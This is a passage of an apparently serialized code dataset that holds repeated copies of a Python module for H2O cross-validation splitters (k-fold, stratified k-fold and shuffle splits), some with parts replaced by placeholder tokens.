frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n <function token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if 